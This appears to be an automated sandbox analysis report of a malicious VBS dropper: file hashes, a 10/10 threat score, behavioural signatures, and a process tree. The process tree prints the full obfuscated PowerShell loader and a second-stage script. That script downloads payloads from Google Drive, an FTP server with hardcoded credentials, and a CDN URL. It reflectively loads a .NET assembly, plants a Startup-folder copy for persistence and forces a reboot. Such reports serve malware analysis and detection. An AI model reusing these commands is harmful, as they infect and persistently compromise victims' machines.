c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e

General

Target

c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs
Size

691KB
MD5

56258f68ad095965e7ef46b623d68619
SHA1

780a03a86b36e69f5169905fa52bc352b1c993a2
SHA256

c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e
SHA512

4461f4de2fb0dc61e0e0dc62347eca655e4980ad3f222453a3dbfb6533b13b6bee9ee9cbf122db508639968fdb671b42154d1460ac6e967d47b3fd5518f96a3f
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE77777777777777777777777777777777777777v:45VLpOe/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2640	powershell.exe
2808	powershell.exe
2948	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2808	powershell.exe
2948	powershell.exe
2644	powershell.exe
2640	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2096 wrote to memory of 2808	2096	WScript.exe	30
PID 2096 wrote to memory of 2808	2096	WScript.exe	30
PID 2096 wrote to memory of 2808	2096	WScript.exe	30
PID 2808 wrote to memory of 2948	2808	powershell.exe	32
PID 2808 wrote to memory of 2948	2808	powershell.exe	32
PID 2808 wrote to memory of 2948	2808	powershell.exe	32
PID 2948 wrote to memory of 2644	2948	powershell.exe	33
PID 2948 wrote to memory of 2644	2948	powershell.exe	33
PID 2948 wrote to memory of 2644	2948	powershell.exe	33
PID 2644 wrote to memory of 2672	2644	powershell.exe	34
PID 2644 wrote to memory of 2672	2644	powershell.exe	34
PID 2644 wrote to memory of 2672	2644	powershell.exe	34
PID 2948 wrote to memory of 2640	2948	powershell.exe	35
PID 2948 wrote to memory of 2640	2948	powershell.exe	35
PID 2948 wrote to memory of 2640	2948	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉEEШḆЉcШḆЉB1ШḆЉHEШḆЉSwBSШḆЉHcШḆЉSgШḆЉvШḆЉDgШḆЉNgBhШḆЉDШḆЉШḆЉOШḆЉBiШḆЉDMШḆЉZQШḆЉtШḆЉGYШḆЉYwШḆЉzШḆЉGIШḆЉLQШḆЉ0ШḆЉGUШḆЉMwШḆЉ2ШḆЉC0ШḆЉYQШḆЉxШḆЉDQШḆЉNgШḆЉtШḆЉGYШḆЉZQШḆЉyШḆЉDШḆЉШḆЉNgШḆЉ0ШḆЉDkШḆЉNQBlШḆЉDYШḆЉYwШḆЉ2ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉwШḆЉDcШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJQШḆЉyШḆЉDIШḆЉJQШḆЉzШḆЉEIШḆЉKwBmШḆЉGkШḆЉbШḆЉBlШḆЉG4ШḆЉYQBtШḆЉGUШḆЉJQШḆЉyШḆЉEEШḆЉJQШḆЉzШḆЉEQШḆЉVQBUШḆЉEYШḆЉLQШḆЉ4ШḆЉCUШḆЉMgШḆЉ3ШḆЉCUШḆЉMgШḆЉ3ШḆЉDШḆЉШḆЉNwШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉmШḆЉHMШḆЉbwB1ШḆЉHIШḆЉYwBlШḆЉD0ШḆЉZШḆЉBvШḆЉHcШḆЉbgBsШḆЉG8ШḆЉYQBkШḆЉCYШḆЉdgШḆЉ9ШḆЉCUШḆЉMgШḆЉyШḆЉGEШḆЉNgBhШḆЉDQШḆЉMQШḆЉ3ШḆЉDUШḆЉNgBmШḆЉDgШḆЉOШḆЉBiШḆЉDQШḆЉZQШḆЉxШḆЉDUШḆЉNQBmШḆЉGQШḆЉOШḆЉШḆЉzШḆЉDШḆЉШḆЉMШḆЉШḆЉwШḆЉDIШḆЉNgBhШḆЉGMШḆЉYgШḆЉzШḆЉDEШḆЉMwШḆЉlШḆЉDIШḆЉMgШḆЉnШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉFsШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉbШḆЉBsШḆЉHUШḆЉbgШḆЉkШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGsШḆЉbwB2ШḆЉG4ШḆЉSQШḆЉuШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEkШḆЉVgBGШḆЉHIШḆЉcШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉBkШḆЉG8ШḆЉaШḆЉB0ШḆЉGUШḆЉTQB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉJwШḆЉxШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉuШḆЉDMШḆЉeQByШḆЉGEШḆЉcgBiШḆЉGkШḆЉTШḆЉBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉJwШḆЉoШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGQШḆЉYQBvШḆЉEwШḆЉLgBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉB0ШḆЉG4ШḆЉZQByШḆЉHIШḆЉdQBDШḆЉDoШḆЉOgBdШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBBШḆЉCcШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉJwCTIToШḆЉkyEnШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGMШḆЉYQBsШḆЉHШḆЉШḆЉZQBSШḆЉC4ШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉoШḆЉGUШḆЉcwBvШḆЉHШḆЉШḆЉcwBpШḆЉGQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHQШḆЉeШḆЉB0ШḆЉC4ШḆЉMQШḆЉwШḆЉEwШḆЉTШḆЉBEШḆЉC8ШḆЉMQШḆЉwШḆЉC8ШḆЉcgBlШḆЉHQШḆЉcШḆЉB5ШḆЉHIШḆЉYwBwШḆЉFUШḆЉLwByШḆЉGIШḆЉLgBtШḆЉG8ШḆЉYwШḆЉuШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLgBwШḆЉHQШḆЉZgBШḆЉШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉvШḆЉC8ШḆЉOgBwШḆЉHQШḆЉZgШḆЉnШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉG4ШḆЉWgB3ШḆЉEEШḆЉRwШḆЉkШḆЉDsШḆЉMgШḆЉxШḆЉHMШḆЉbШḆЉBUШḆЉDoШḆЉOgBdШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉbШḆЉBvШḆЉGMШḆЉbwB0ШḆЉG8ШḆЉcgBQШḆЉHkШḆЉdШḆЉBpШḆЉHIШḆЉdQBjШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwB9ШḆЉGUШḆЉdQByШḆЉHQШḆЉJШḆЉB7ШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGsШḆЉYwBhШḆЉGIШḆЉbШḆЉBsШḆЉGEШḆЉQwBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉZШḆЉBpШḆЉGwШḆЉYQBWШḆЉGUШḆЉdШḆЉBhШḆЉGMШḆЉaQBmШḆЉGkШḆЉdШḆЉByШḆЉGUШḆЉQwByШḆЉGUШḆЉdgByШḆЉGUШḆЉUwШḆЉ6ШḆЉDoШḆЉXQByШḆЉGUШḆЉZwBhШḆЉG4ШḆЉYQBNШḆЉHQШḆЉbgBpШḆЉG8ШḆЉUШḆЉBlШḆЉGMШḆЉaQB2ШḆЉHIШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉIШḆЉBmШḆЉC8ШḆЉIШḆЉШḆЉwШḆЉCШḆЉШḆЉdШḆЉШḆЉvШḆЉCШḆЉШḆЉcgШḆЉvШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBuШḆЉHcШḆЉbwBkШḆЉHQШḆЉdQBoШḆЉHMШḆЉIШḆЉШḆЉ7ШḆЉCcШḆЉMШḆЉШḆЉ4ШḆЉDEШḆЉIШḆЉBwШḆЉGUШḆЉZQBsШḆЉHMШḆЉJwШḆЉgШḆЉGQШḆЉbgBhШḆЉG0ШḆЉbQBvШḆЉGMШḆЉLQШḆЉgШḆЉGUШḆЉeШḆЉBlШḆЉC4ШḆЉbШḆЉBsШḆЉGUШḆЉaШḆЉBzШḆЉHIШḆЉZQB3ШḆЉG8ШḆЉcШḆЉШḆЉ7ШḆЉCШḆЉШḆЉZQBjШḆЉHIШḆЉbwBmШḆЉC0ШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwBtШḆЉGEШḆЉcgBnШḆЉG8ШḆЉcgBQШḆЉFwШḆЉdQBuШḆЉGUШḆЉTQШḆЉgШḆЉHQШḆЉcgBhШḆЉHQШḆЉUwBcШḆЉHMШḆЉdwBvШḆЉGQШḆЉbgBpШḆЉFcШḆЉXШḆЉB0ШḆЉGYШḆЉbwBzШḆЉG8ШḆЉcgBjШḆЉGkШḆЉTQBcШḆЉGcШḆЉbgBpШḆЉG0ШḆЉYQBvШḆЉFIШḆЉXШḆЉBhШḆЉHQШḆЉYQBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉgШḆЉCgШḆЉIШḆЉBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉbgBpШḆЉHQШḆЉcwBlШḆЉEQШḆЉLQШḆЉgШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉbQBlШḆЉHQШḆЉSQШḆЉtШḆЉHkШḆЉcШḆЉBvШḆЉEMШḆЉIШḆЉШḆЉ7ШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBzШḆЉGUШḆЉcgBvШḆЉG4ШḆЉLwШḆЉgШḆЉHQШḆЉZQBpШḆЉHUШḆЉcQШḆЉvШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBhШḆЉHMШḆЉdQB3ШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉCШḆЉШḆЉOwШḆЉpШḆЉCcШḆЉdQBzШḆЉG0ШḆЉLgBuШḆЉGkШḆЉdwBwШḆЉFUШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉGEШḆЉdШḆЉBzШḆЉGEШḆЉcШḆЉШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉGUШḆЉbQBhШḆЉE4ШḆЉcgBlШḆЉHMШḆЉVQШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉG4ШḆЉZQBtШḆЉG4ШḆЉbwByШḆЉGkШḆЉdgBuШḆЉEUШḆЉWwШḆЉgШḆЉCsШḆЉIШḆЉШḆЉnШḆЉFwШḆЉcwByШḆЉGUШḆЉcwBVШḆЉFwШḆЉOgBDШḆЉCcШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉYQB0ШḆЉHMШḆЉYQBwШḆЉCQШḆЉIШḆЉШḆЉsШḆЉEIШḆЉSwBMШḆЉFIШḆЉVQШḆЉkШḆЉCgШḆЉZQBsШḆЉGkШḆЉRgBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉHMШḆЉVQBIШḆЉHUШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwB9ШḆЉDsШḆЉIШḆЉШḆЉpШḆЉCcШḆЉcgBnШḆЉDgШḆЉRШḆЉШḆЉ3ШḆЉG8ШḆЉUgBzШḆЉGYШḆЉVgBjШḆЉHIШḆЉMgBuШḆЉEEШḆЉaШḆЉBmШḆЉGgШḆЉVgШḆЉ2ШḆЉEQШḆЉQwB4ШḆЉFIШḆЉcQBuШḆЉHEШḆЉagШḆЉ1ШḆЉGoШḆЉcgBiШḆЉDEШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBQШḆЉHШḆЉШḆЉVgBpШḆЉHMШḆЉJШḆЉШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwB4ШḆЉDQШḆЉZgBoШḆЉFoШḆЉTQB3ШḆЉE4ШḆЉNwBVШḆЉGUШḆЉXwШḆЉwШḆЉF8ШḆЉNQBfШḆЉGkШḆЉYwBzШḆЉGIШḆЉaШḆЉШḆЉ3ШḆЉEMШḆЉUШḆЉШḆЉwШḆЉEkШḆЉZgBQШḆЉGQШḆЉQQШḆЉyШḆЉDEШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcABWAGkAcwAkACgAIAA9ACAAUABwAFYAaQBzACQAewAgACkAbwBHAGYARABRACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAbwBHAGYARABRACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAFAAcABWAGkAcwAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAEgAQgBaAGoARgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABIAEIAWgBqAEYAJAAgADsA';$RIyag = $qCybe.replace('ШḆЉ' , 'A') ;$gsoKZ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $RIyag ) ); $gsoKZ = $gsoKZ[-1..-$gsoKZ.Length] -join '';$gsoKZ = $gsoKZ.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs');powershell $gsoKZ
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $FjZBH = $host.Version.Major.Equals(2) ;if ($FjZBH) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$uHUso = (New-Object Net.WebClient);$uHUso.Encoding = [System.Text.Encoding]::UTF8;$uHUso.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $lqVmC.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '22%313bca6200038df551e4b88f65714a6a22%=v&daolnwod=ecruos&txt.4202.80.7072%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.7022%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.6c6e594602ef-641a-63e4-b3cf-e3b80a68/JwRKqupA/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
